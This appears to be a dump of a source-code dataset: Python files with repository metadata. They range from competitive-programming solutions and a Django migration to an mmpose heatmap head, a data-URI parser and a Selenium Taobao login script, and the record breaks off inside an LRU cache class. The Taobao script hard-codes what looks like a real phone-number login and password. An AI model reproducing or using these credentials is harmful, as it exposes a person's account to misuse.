blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6e3fa8511feac5e49a76f72bce10aae1e8c65edc
|
76e6d4f93078327fef8672133fc75a6f12abc240
|
/ABC113/C.py
|
61cb33095956fd32ac9d317c34bbae65700eecd4
|
[] |
no_license
|
adusa1019/atcoder
|
1e8f33253f6f80a91d069b2f3b568ce7a2964940
|
f7dbdfc021425160a072f4ce4e324953a376133a
|
refs/heads/master
| 2021-08-08T04:41:36.098678
| 2021-02-01T07:34:34
| 2021-02-01T07:34:34
| 89,038,783
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 640
|
py
|
import numpy as np
def solve(string):
    """Number each city by prefecture and in-prefecture birth-year rank.

    Input: "n m p1 y1 p2 y2 ..." (whitespace separated). For each city, the
    answer line is its zero-padded 6-digit prefecture id followed by the
    zero-padded 6-digit rank of its birth year within that prefecture.
    """
    tokens = list(map(int, string.split()))
    n = tokens[0]
    pairs = list(zip(tokens[2::2], tokens[3::2]))
    # Collect birth years per prefecture, preserving input order.
    years_by_pref = [[] for _ in range(n)]
    for pref, year in pairs:
        years_by_pref[pref - 1].append(year)
    # argsort of argsort maps each entry to its rank in sorted order.
    ranks = [np.argsort(np.argsort(ys)) for ys in years_by_pref]
    seen = [0] * n
    lines = []
    for pref, _ in pairs:
        idx = seen[pref - 1]
        lines.append("{:06}{:06}".format(pref, ranks[pref - 1][idx] + 1))
        seen[pref - 1] += 1
    return "\n".join(lines)
if __name__ == '__main__':
    # Read n (prefectures) and m (cities), then pass the remaining m "p y"
    # lines to solve() as one whitespace-separated string.
    n, m = map(int, input().split())
    print(solve("{} {}\n".format(n, m) + "\n".join([input() for _ in range(m)])))
|
[
"symphony20030829@yahoo.co.jp"
] |
symphony20030829@yahoo.co.jp
|
3dea3a1eb262af6d0fd57d983b6b19ebe8d4e017
|
a151a28de438a4214a14e5bf42a7761157f8e587
|
/stoq/plugins/decoder.py
|
5add552024bc67d4aaa07ff1a863c73f63adf3cf
|
[
"Apache-2.0"
] |
permissive
|
maydewd/stoq
|
f606f77c0dd38aeeb7e7ea48a840d8561ee18213
|
f72bbaf273640d645b8f9c20dc587e03373e24be
|
refs/heads/master
| 2021-06-21T20:34:51.885413
| 2018-05-18T12:03:15
| 2018-05-18T12:03:15
| 124,784,720
| 0
| 0
|
Apache-2.0
| 2018-03-11T18:14:34
| 2018-03-11T18:14:34
| null |
UTF-8
|
Python
| false
| false
| 1,305
|
py
|
# Copyright 2014-2018 PUNCH Cyber Analytics Group
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from stoq.plugins.base import StoqPluginBase
class StoqDecoderPlugin(StoqPluginBase):
    """Base class for stoQ decoder plugins."""

    def decode(self):
        # Subclasses provide the actual decoding logic.
        pass

    def to_bytearray(self, payload):
        """
        Convert payload to a bytearray

        :param bytes payload: Payload to be converted into byte array

        :returns: Payload as a bytearray
        :rtype: bytearray

        """
        self.log.debug("Converting payload ({} bytes) to a bytearray".format(len(payload)))
        if isinstance(payload, bytearray):
            return payload
        if isinstance(payload, bytes):
            return bytearray(payload)
        # Anything else (e.g. str) is encoded to bytes first.
        return bytearray(payload.encode())
|
[
"marcus@randomhack.org"
] |
marcus@randomhack.org
|
84d8fb4c900688d98e3349cf4f0ad73513d2492e
|
f2ad830cea2c8a071601a94ffe1f6e1095436a05
|
/download.py
|
7d180127987be5df2f71fba8767d9af85790626a
|
[] |
no_license
|
naveenprolific/python
|
859b6cd7683a94597e5f6cbb07e9a12c1b594c11
|
c440f6b46b50d5f9e82966eed612d3ad7d4699f2
|
refs/heads/master
| 2021-01-25T11:40:30.928778
| 2019-08-17T06:11:19
| 2019-08-17T06:11:19
| 123,420,455
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 200
|
py
|
# Per test case: read n item lines "t d" and a budget k; k is spent greedily
# (in input order) to reduce each t, and the cost t*d of the remainder is
# summed. (Presumably a competitive-programming task — semantics inferred
# from the arithmetic only.)
for _case in range(int(input())):  # fix: inner loop re-used and shadowed `i`
    n, k = map(int, input().split())
    total = 0
    for _ in range(n):
        t, d = map(int, input().split())
        if k > 0:
            # Apply as much of the remaining budget k to this t as possible.
            if t >= k:
                t -= k
                k = 0
            else:
                k -= t
                t = 0
        total += t * d
    print(total)
|
[
"naveenlingerer12345@gmail.com"
] |
naveenlingerer12345@gmail.com
|
6922739fc57fda950b96b25e4975f0336ff70aad
|
fb33b689b8ebd54695828dab3f9d1db074203d34
|
/practice/mysite/blog/migrations/0001_initial.py
|
44a42493d1c554b4c29522a9c80df7b912f8a092
|
[] |
no_license
|
takumikaka/workspace
|
471ab6e60d47f61ae36e4b95e8d58b0840188f65
|
f72946ff5f46b549dfab51a0038f05478b301490
|
refs/heads/master
| 2021-05-06T11:58:24.334256
| 2019-03-22T08:32:18
| 2019-03-22T08:32:18
| 113,008,406
| 1
| 0
| null | 2018-02-23T12:28:54
| 2017-12-04T07:14:00
|
Python
|
UTF-8
|
Python
| false
| false
| 986
|
py
|
# Generated by Django 2.1 on 2018-01-09 02:48
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated Django migration (see header comment): creates the
    # BlogArticles table with title/body text fields, a publish timestamp
    # defaulting to now, and an author FK to the configured user model.
    # Generated code — avoid hand-editing the operations below.

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='BlogArticles',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=300)),
                ('body', models.TextField()),
                ('publish', models.DateTimeField(default=django.utils.timezone.now)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                # Newest articles first.
                'ordering': ('-publish',),
            },
        ),
    ]
|
[
"qk2006qk@163.com"
] |
qk2006qk@163.com
|
1d6fbb6576b0a599b201498124a372af35875ab6
|
f8e4ff05c94a8f1967fd0604ffcb1ae4e96b8feb
|
/mytest/login_taobao.py
|
ceb9de4a5bacc33ae5ad2c5038061fae0327366b
|
[] |
no_license
|
Cherry93/Myspider
|
d2d644612f4167ec13fea33e52ea810de3a3a639
|
ce5f821f2a2c26bba2c4b22c908cc65d07969b07
|
refs/heads/master
| 2021-04-09T10:40:34.320831
| 2018-03-16T09:57:13
| 2018-03-16T09:57:13
| 125,494,372
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,148
|
py
|
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
import time
class loginTB(object):
    """Selenium-driven Taobao login helper.

    Drives a Chrome browser through Taobao's password-login page, then probes
    a series of page states (personal-info panel, homepage avatar, SMS
    verification iframe) to decide whether login succeeded, needs phone
    verification, or should be retried with new credentials.
    """
    def __init__(self):
        self.driver = webdriver.Chrome()
        self.driver.maximize_window()
        # Set up a shared explicit wait (up to 5 seconds).
        self.wait = WebDriverWait(self.driver,5)
    def login(self,key,pw):
        """Attempt to log in with account `key` and password `pw`.

        Recurses (prompting on stdin for new credentials) when the
        credentials appear to be wrong.
        """
        url = 'https://login.taobao.com/member/login.jhtml'
        self.driver.get(url)
        try:
            # Find the password-login tab.
            login_links = self.wait.until(
                EC.presence_of_element_located((By.XPATH,"//a[text()='密码登录']"))
            )
            login_links.click()
        except TimeoutException as e:
            print("找不到登陆入口,原因是:",e)
        else:
            # Enter the account name and password.
            input_key = self.wait.until(
                EC.presence_of_element_located((By.XPATH,"//input[@name='TPL_username']"))
            )
            input_pw = self.wait.until(
                EC.presence_of_element_located((By.XPATH,"//input[@name='TPL_password']"))
            )
            input_key.clear()
            input_pw.clear()
            input_key.send_keys(key)
            input_pw.send_keys(pw)
            self.driver.find_element_by_xpath('//*[@id="J_SubmitStatic"]').click()
            try:
                # Probe for the personal-info panel; absence suggests the
                # login did not land on the member page.
                user_info = self.wait.until(
                    EC.presence_of_element_located((By.XPATH,"//div[@class='m-userinfo']"))
                )
                print('已经登陆成功,进入了个人中心')
            except TimeoutException:
                try:
                    # Maybe we landed on the homepage instead — look for the avatar.
                    self.driver.find_element_by_xpath("//div[@class='avatar-wrapper']")
                    print('已经登录成功,进入了淘宝网首页')
                except:  # NOTE(review): bare except swallows everything, incl. KeyboardInterrupt
                    try:
                        # Look for the phone-verification iframe; finding it
                        # means SMS verification is required.
                        frame = self.wait.until(
                            EC.presence_of_element_located((By.XPATH,'//div[@class="login-check-left"]/iframe'))
                        )
                        print('本次登录需要进行手机验证...')
                    except TimeoutException:
                        # No verification frame either: credentials were likely
                        # wrong — prompt for new ones and retry.
                        print('登录失败,目测是账号或密码有误,请检查后重新登录...')
                        key = input('请重新输入账号:').strip()
                        pw = input('请重新输入密码:').strip()
                        self.login(key,pw)
                    else:
                        # Drive the SMS verification flow inside the iframe.
                        self.driver.switch_to.frame(frame)
                        phone_num = self.wait.until(
                            EC.presence_of_element_located((By.XPATH,'//button[@id="J_GetCode"]'))
                        )
                        phone_num.click()
                        phone_key = input('请输入手机验证码:').strip()
                        key_send = self.wait.until(
                            EC.presence_of_element_located((By.XPATH,'//input[@id="J_Phone_Checkcode"]'))
                        )
                        key_send.send_keys(phone_key)
                        go_button = self.wait.until(
                            EC.presence_of_element_located((By.XPATH,'//input[@type="submit"]'))
                        )
                        go_button.click()
                        user_info = self.wait.until(
                            EC.presence_of_element_located((By.XPATH, "//div[@class='m-userinfo']"))
                        )
                        print('手机验证登陆成功!!!')
if __name__ == '__main__':
    t = time.time()
    l = loginTB()
    # SECURITY(review): real-looking credentials are hard-coded here; they
    # should be removed/rotated and supplied via input or configuration.
    l.login('18774389936','chensi710029')
    print('登录完成,耗时{:.2f}秒'.format(float(time.time()-t)))
|
[
"358544104@qq.com"
] |
358544104@qq.com
|
6da539218ab518c0e6a9869cf1b56d4ad4487075
|
df1e54249446ba2327442e2dbb77df9931f4d039
|
/deprecated/parameters.py
|
07a7e876741747ba5a8d8f974567a383fe9fa1ac
|
[
"Apache-2.0"
] |
permissive
|
tarsqi/ttk
|
8c90ee840606fb4c59b9652bd87a0995286f1c3d
|
085007047ab591426d5c08b123906c070deb6627
|
refs/heads/master
| 2021-07-12T06:56:19.924195
| 2021-03-02T22:05:39
| 2021-03-02T22:05:39
| 35,170,093
| 26
| 12
|
Apache-2.0
| 2021-03-02T22:05:39
| 2015-05-06T16:24:38
|
Python
|
UTF-8
|
Python
| false
| false
| 1,425
|
py
|
class ParameterMixin:
    """Mixin class that provides access to elements in the parameter dictionary
    that lives on Tarsqi and TarsqiDocument instances. This is where parameter
    defaults are specified."""

    def getopt(self, option_name):
        """Return the named option; None when it was never set."""
        return self.parameters.get(option_name)

    def getopt_genre(self):
        """Return the 'genre' user option (default None)."""
        return self.parameters.get('genre')

    def getopt_source(self):
        """Return the 'source' user option (default None)."""
        return self.parameters.get('source')

    def getopt_platform(self):
        """Return the 'platform' user option (default None)."""
        return self.parameters.get('platform')

    def getopt_trap_errors(self):
        """Return the 'trap-errors' user option (default True).

        NOTE(review): unlike the other options this key is hyphenated, and the
        coded default is True (the original docstring claimed False)."""
        return self.parameters.get('trap-errors', True)

    def getopt_pipeline(self):
        """Return the 'pipeline' user option (default None)."""
        return self.parameters.get('pipeline')

    def getopt_extension(self):
        """Return the 'extension' user option (default '')."""
        return self.parameters.get('extension', '')

    def getopt_perl(self):
        """Return the 'perl' user option (default 'perl')."""
        return self.parameters.get('perl', 'perl')
|
[
"marc@cs.brandeis.edu"
] |
marc@cs.brandeis.edu
|
3ac9bba729173c49f50ee9cee4b784b0ed5f4e2f
|
21cd0b41e987a131c4ef99969f40becabe815d9c
|
/data_uri.py
|
e9ace7c48d80f75569ddc4879c509aab3bbd3529
|
[] |
no_license
|
fake-name/wlnupdates
|
7412d0852b096a4c0bbbbc0b66fbb3a94103346e
|
95ed8d20e55f54ebfed10ec07d213eb71fb48e8a
|
refs/heads/master
| 2023-09-03T08:05:55.768504
| 2021-09-27T05:52:11
| 2021-09-27T05:52:11
| 33,464,882
| 33
| 6
| null | 2023-09-11T15:49:51
| 2015-04-06T03:26:11
|
Python
|
UTF-8
|
Python
| false
| false
| 1,507
|
py
|
import mimetypes
import re
import urllib
import base64
# Regex pieces for RFC 2397 data: URIs — data:[<mimetype>][;charset=<cs>][;base64],<data>
MIMETYPE_REGEX = r'[\w]+\/[\w\-\+\.]+'
_MIMETYPE_RE = re.compile('^{}$'.format(MIMETYPE_REGEX))

CHARSET_REGEX = r'[\w\-\+\.]+'
_CHARSET_RE = re.compile('^{}$'.format(CHARSET_REGEX))

DATA_URI_REGEX = (
    r'data:' +
    r'(?P<mimetype>{})?'.format(MIMETYPE_REGEX) +
    r'(?:\;charset\=(?P<charset>{}))?'.format(CHARSET_REGEX) +
    r'(?P<base64>\;base64)?' +
    r',(?P<data>.*)')
# DOTALL so a wrapped (newline-containing) URI still matches.
_DATA_URI_RE = re.compile(r'^{}$'.format(DATA_URI_REGEX), re.DOTALL)


class DataURI(str):
    """A str subclass for data: URIs with parsed-out component accessors.

    Invalid URIs raise ValueError at construction time.
    """

    def __new__(cls, *args, **kwargs):
        uri = super(DataURI, cls).__new__(cls, *args, **kwargs)
        uri._parse  # Trigger any ValueErrors on instantiation.
        return uri

    def __repr__(self):
        return 'DataURI(%s)' % (super(DataURI, self).__repr__(),)

    def wrap(self, width=76):
        """Return a copy of this URI hard-wrapped to *width* characters."""
        import textwrap  # fix: textwrap was used here but never imported
        return type(self)('\n'.join(textwrap.wrap(self, width)))

    @property
    def mimetype(self):
        """The URI's mimetype, or None when absent."""
        return self._parse[0]

    @property
    def charset(self):
        """The URI's charset, or None when absent."""
        return self._parse[1]

    @property
    def is_base64(self):
        """True when the payload is base64-encoded."""
        return self._parse[2]

    @property
    def data(self):
        """The decoded payload: bytes when base64, percent-unquoted str otherwise."""
        return self._parse[3]

    @property
    def _parse(self):
        """Split this URI into (mimetype, charset, is_base64, data).

        Raises:
            ValueError: when the string is not a valid data URI.
        """
        match = _DATA_URI_RE.match(self)
        if not match:
            raise ValueError("Not a valid data URI: %r" % self)
        mimetype = match.group('mimetype') or None
        charset = match.group('charset') or None
        if match.group('base64'):
            data = base64.b64decode(match.group('data').encode('utf-8'))
        else:
            # fix: Python 3 moved unquote to urllib.parse; the original
            # called the Python-2-only urllib.unquote.
            from urllib.parse import unquote
            data = unquote(match.group('data'))
        return mimetype, charset, bool(match.group('base64')), data
|
[
"something@fake-url.com"
] |
something@fake-url.com
|
78adfeac2113a9117424cee5f1b68120915a0d96
|
3b84c4b7b16ccfd0154f8dcb75ddbbb6636373be
|
/google-cloud-sdk/lib/googlecloudsdk/command_lib/container/azure/util.py
|
46a4126401b0bc61d927cafeba3008673d0a2ca7
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
twistedpair/google-cloud-sdk
|
37f04872cf1ab9c9ce5ec692d2201a93679827e3
|
1f9b424c40a87b46656fc9f5e2e9c81895c7e614
|
refs/heads/master
| 2023-08-18T18:42:59.622485
| 2023-08-15T00:00:00
| 2023-08-15T12:14:05
| 116,506,777
| 58
| 24
| null | 2022-02-14T22:01:53
| 2018-01-06T18:40:35
|
Python
|
UTF-8
|
Python
| false
| false
| 1,323
|
py
|
# -*- coding: utf-8 -*- #
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command utilities for `gcloud container azure` commands."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
CLUSTERS_FORMAT = """
table(
name.segment(-1):label=NAME,
azureRegion,
controlPlane.version:label=CONTROL_PLANE_VERSION,
endpoint:label=CONTROL_PLANE_IP,
controlPlane.vmSize,
state)
"""
CLIENT_FORMAT = """
table(
name.segment(-1),
tenantId,
applicationId)
"""
NODE_POOL_FORMAT = """
table(name.segment(-1),
version:label=NODE_VERSION,
config.vmSize,
autoscaling.minNodeCount.yesno(no='0'):label=MIN_NODES,
autoscaling.maxNodeCount:label=MAX_NODES,
state)
"""
|
[
"gcloud@google.com"
] |
gcloud@google.com
|
3619cfbcab6dd50f85a2d36dcdb5282dc552ba16
|
6ed034d0a5e239d7b0c528b287451409ffb4a494
|
/mmpose/models/heads/topdown_heatmap_base_head.py
|
09646ead353fb054f066b9fc6816748a43287e2c
|
[
"Apache-2.0"
] |
permissive
|
ViTAE-Transformer/ViTPose
|
8f9462bd5bc2fb3e66de31ca1d03e5a9135cb2bf
|
d5216452796c90c6bc29f5c5ec0bdba94366768a
|
refs/heads/main
| 2023-05-23T16:32:22.359076
| 2023-03-01T06:42:22
| 2023-03-01T06:42:22
| 485,999,907
| 869
| 132
|
Apache-2.0
| 2023-03-01T06:42:24
| 2022-04-27T01:09:19
|
Python
|
UTF-8
|
Python
| false
| false
| 3,956
|
py
|
# Copyright (c) OpenMMLab. All rights reserved.
from abc import ABCMeta, abstractmethod
import numpy as np
import torch.nn as nn
from mmpose.core.evaluation.top_down_eval import keypoints_from_heatmaps
class TopdownHeatmapBaseHead(nn.Module):
    """Base class for top-down heatmap heads.

    All top-down heatmap heads should subclass it.
    All subclass should overwrite:

    Methods:`get_loss`, supporting to calculate loss.
    Methods:`get_accuracy`, supporting to calculate accuracy.
    Methods:`forward`, supporting to forward model.
    Methods:`inference_model`, supporting to inference model.
    """

    __metaclass__ = ABCMeta

    @abstractmethod
    def get_loss(self, **kwargs):
        """Gets the loss."""

    @abstractmethod
    def get_accuracy(self, **kwargs):
        """Gets the accuracy."""

    @abstractmethod
    def forward(self, **kwargs):
        """Forward function."""

    @abstractmethod
    def inference_model(self, **kwargs):
        """Inference function."""

    def decode(self, img_metas, output, **kwargs):
        """Decode keypoints from heatmaps.

        Args:
            img_metas (list(dict)): Information about data augmentation
                By default this includes:
                - "image_file: path to the image file
                - "center": center of the bbox
                - "scale": scale of the bbox
                - "rotation": rotation of the bbox
                - "bbox_score": score of bbox
            output (np.ndarray[N, K, H, W]): model predicted heatmaps.

        Returns:
            dict: 'preds' (N, K, 3) keypoints+score, 'boxes' (N, 6)
            center/scale/area/score, 'image_paths', and 'bbox_ids'
            (list or None).
        """
        batch_size = len(img_metas)

        # Track bbox ids only when the metas carry them.
        if 'bbox_id' in img_metas[0]:
            bbox_ids = []
        else:
            bbox_ids = None

        # Per-sample bbox center (x, y) and scale (w, h) for heatmap->image mapping.
        c = np.zeros((batch_size, 2), dtype=np.float32)
        s = np.zeros((batch_size, 2), dtype=np.float32)
        image_paths = []
        score = np.ones(batch_size)  # default bbox score of 1 when none given
        for i in range(batch_size):
            c[i, :] = img_metas[i]['center']
            s[i, :] = img_metas[i]['scale']
            image_paths.append(img_metas[i]['image_file'])

            if 'bbox_score' in img_metas[i]:
                score[i] = np.array(img_metas[i]['bbox_score']).reshape(-1)
            if bbox_ids is not None:
                bbox_ids.append(img_metas[i]['bbox_id'])

        # Heatmap -> image-space keypoint coordinates plus confidences;
        # behavior is controlled entirely through test_cfg options.
        preds, maxvals = keypoints_from_heatmaps(
            output,
            c,
            s,
            unbiased=self.test_cfg.get('unbiased_decoding', False),
            post_process=self.test_cfg.get('post_process', 'default'),
            kernel=self.test_cfg.get('modulate_kernel', 11),
            valid_radius_factor=self.test_cfg.get('valid_radius_factor',
                                                  0.0546875),
            use_udp=self.test_cfg.get('use_udp', False),
            target_type=self.test_cfg.get('target_type', 'GaussianHeatmap'))

        all_preds = np.zeros((batch_size, preds.shape[1], 3), dtype=np.float32)
        all_boxes = np.zeros((batch_size, 6), dtype=np.float32)
        all_preds[:, :, 0:2] = preds[:, :, 0:2]
        all_preds[:, :, 2:3] = maxvals
        all_boxes[:, 0:2] = c[:, 0:2]
        all_boxes[:, 2:4] = s[:, 0:2]
        # NOTE(review): scale appears to be in units of 200px (mmpose
        # convention), making s*200 the bbox area in pixels — confirm.
        all_boxes[:, 4] = np.prod(s * 200.0, axis=1)
        all_boxes[:, 5] = score

        result = {}
        result['preds'] = all_preds
        result['boxes'] = all_boxes
        result['image_paths'] = image_paths
        result['bbox_ids'] = bbox_ids

        return result

    @staticmethod
    def _get_deconv_cfg(deconv_kernel):
        """Get configurations for deconv layers.

        Maps a deconv kernel size (4/3/2) to (kernel, padding, output_padding)
        so the upsampling layer exactly doubles spatial resolution.
        """
        if deconv_kernel == 4:
            padding = 1
            output_padding = 0
        elif deconv_kernel == 3:
            padding = 1
            output_padding = 1
        elif deconv_kernel == 2:
            padding = 0
            output_padding = 0
        else:
            raise ValueError(f'Not supported num_kernels ({deconv_kernel}).')

        return deconv_kernel, padding, output_padding
|
[
"annblessus@gmail.com"
] |
annblessus@gmail.com
|
542d08d969b7c6e3e26c5c442a28e8523898506c
|
9f02973cd0b8e7886085b7cff75b0f515ddf1a37
|
/关联分析_Apriori/src/process.py
|
1e7622e4f4b0eaeec5e077413859393a7aa7a059
|
[] |
no_license
|
damo894127201/MachineLearning
|
9c578628936ded8e4c26c232d6adabc58e09bf54
|
ca0d43c9ba8ff7d1353606ba893291e3bf10f9e7
|
refs/heads/master
| 2020-07-23T12:23:48.141435
| 2019-11-20T02:06:48
| 2019-11-20T02:06:48
| 207,554,934
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,343
|
py
|
# -*- coding: utf-8 -*-
# @Time : 2019/11/12 22:32
# @Author : Weiyang
# @File : process.py
# =====================================================================================================================
# ../data/data.xlsx中,有两列:销售单明细 和 商品编码(脱过敏),其中每一行表示一条交易和一件商品
# 本模块的目的在于
# 将../data/data.xlsx数据转为 每一行表示一条交易事务,和该交易对应的所有商品序列,商品间以 , 隔开
# =====================================================================================================================
import pandas as pd
from collections import defaultdict
# Load the raw sheet: one row per (transaction id, item code) pair.
# NOTE(review): `index` is not a documented pandas.read_excel keyword — verify
# against the pandas version in use.
data = pd.read_excel('../data/data.xlsx',index=False)
# Group item codes by transaction id ('销售单明细' = sales-order detail id,
# '商品编码' = item code). NOTE(review): loop variable `id` shadows the builtin.
transaction = defaultdict(set)
for id in data.index:
    transaction[data.loc[id]['销售单明细']].add(data.loc[id]['商品编码'])
# One output row per transaction: the order id and its comma-joined item codes.
new_data = pd.DataFrame(index=range(len(transaction.keys())),columns=['销售单编号','商品编码序列'])
for id,key in enumerate(transaction.keys()):
    new_data.loc[id]['销售单编号'] = key
    new_data.loc[id]['商品编码序列'] = ','.join(list(transaction[key]))
# Write to Excel; `index` controls row numbers, `header` controls column names.
new_data.to_excel('../data/transaction.xlsx',encoding='utf-8',index=False,header=True)
|
[
"894127201@qq.com"
] |
894127201@qq.com
|
99370e36489ef7f4845f09cd33b9ced5b2efaf53
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03449/s550276409.py
|
ab00968db82a9a7cac9c406ab8f2fc209d3c8fc8
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 626
|
py
|
import sys
from itertools import accumulate
# Fast-input aliases, standard competitive-programming boilerplate.
read = sys.stdin.read
readline = sys.stdin.readline
readlines = sys.stdin.readlines
sys.setrecursionlimit(10 ** 9)  # NOTE(review): far beyond typical C-stack safety
INF = 1 << 60
MOD = 1000000007
def main():
    """Print max over i of sum(A[:i+1]) + sum(B[i:]) for the two input rows."""
    n = int(readline())
    # Prefix sums of both sequences.
    a = list(accumulate(map(int, readline().split())))
    b = list(accumulate(map(int, readline().split())))
    best = 0
    for i in range(n):
        # Prefix of A up to i, plus suffix of B from i onward.
        candidate = a[i] + b[-1] - (b[i - 1] if i else 0)
        if candidate > best:
            best = candidate
    print(best)
    return
if __name__ == '__main__':  # script entry point
    main()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
21c4742ef0f3dc31ea373d154b5804b973be6cb7
|
c8b541ea4fa7d159b80bef116e5cd232ac61b8c1
|
/venv/Lib/test/test_tools/test_i18n.py
|
f9f787a64659c6a71eec015b4bfb7d735e5841c4
|
[] |
no_license
|
shengmenghui/knowledge_building
|
7a2d8eef040c2d3a45726b3a908be301e922024b
|
04fd7784f15535efed917cce44856526f1f0ce48
|
refs/heads/master
| 2022-12-31T14:18:05.282092
| 2020-10-23T02:51:37
| 2020-10-23T02:51:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,602
|
py
|
"""Tests to cover the Tools/i18n package"""
import os
import unittest
from sql_mode.support.script_helper import assert_python_ok
from sql_mode.test_tools import skip_if_missing, toolsdir
from sql_mode.support import temp_cwd
skip_if_missing()
class Test_pygettext(unittest.TestCase):
    """Tests for the pygettext.py tool"""

    # Path to the pygettext.py script under the checked-out Tools directory.
    script = os.path.join(toolsdir,'i18n', 'pygettext.py')

    def get_header(self, data):
        """ utility: return the header of a .po file as a dictionary """
        headers = {}
        for line in data.split('\n'):
            # Skip blank lines and msgid/msgstr/comment lines; only the
            # quoted "Key: value" header entries remain.
            if not line or line.startswith(('#', 'msgid','msgstr')):
                continue
            line = line.strip('"')
            key, val = line.split(':',1)
            headers[key] = val.strip()
        return headers

    def test_header(self):
        """Make sure the required fields are in the header, according to:
           http://www.gnu.org/software/gettext/manual/gettext.html#Header-Entry
        """
        # Run pygettext with no args in a temp dir; it writes messages.pot.
        with temp_cwd(None) as cwd:
            assert_python_ok(self.script)
            with open('messages.pot') as fp:
                data = fp.read()
        header = self.get_header(data)

        self.assertIn("Project-Id-Version", header)
        self.assertIn("POT-Creation-Date", header)
        self.assertIn("PO-Revision-Date", header)
        self.assertIn("Last-Translator", header)
        self.assertIn("Language-Team", header)
        self.assertIn("MIME-Version", header)
        self.assertIn("Content-Type", header)
        self.assertIn("Content-Transfer-Encoding", header)
        self.assertIn("Generated-By", header)

        # not clear if these should be required in POT (template) files
        #self.assertIn("Report-Msgid-Bugs-To", header)
        #self.assertIn("Language", header)

        #"Plural-Forms" is optional

    def test_POT_Creation_Date(self):
        """ Match the date format from xgettext for POT-Creation-Date """
        from datetime import datetime
        with temp_cwd(None) as cwd:
            assert_python_ok(self.script)
            with open('messages.pot') as fp:
                data = fp.read()
        header = self.get_header(data)
        creationDate = header['POT-Creation-Date']

        # peel off the escaped newline at the end of string
        if creationDate.endswith('\\n'):
            creationDate = creationDate[:-len('\\n')]

        # This will raise if the date format does not exactly match.
        datetime.strptime(creationDate, '%Y-%m-%d %H:%M%z')
|
[
"15173342800@163.com"
] |
15173342800@163.com
|
3d30d4cef2e2fc9de7bfc7194868bd42b35729a7
|
e3eead40e93fdf5186269536edefab4f08e9a5a2
|
/LeetCode/146-lru_cache.py
|
33438a65948643aeec344a5d8e2eef71f95d33bb
|
[] |
no_license
|
davll/practical-algorithms
|
bbc930b42363cae00ce39e8a686854c19131d334
|
0e35e4cc87bd41144b8e34302aafe776fec1b356
|
refs/heads/master
| 2021-08-22T13:12:34.555074
| 2020-03-28T08:56:13
| 2020-03-28T08:56:13
| 147,224,029
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,113
|
py
|
# https://leetcode.com/problems/lru-cache/
class LRUCache(object):
    """LRU cache: dict for O(1) lookup plus a doubly-linked list for recency.

    The list runs least- to most-recently used: `_head` is the eviction
    candidate, `_tail` the most recently touched node.
    """

    def __init__(self, capacity):
        """
        :type capacity: int
        """
        self._capacity = capacity
        self._storage = {}   # key -> Node
        self._head = None    # least recently used
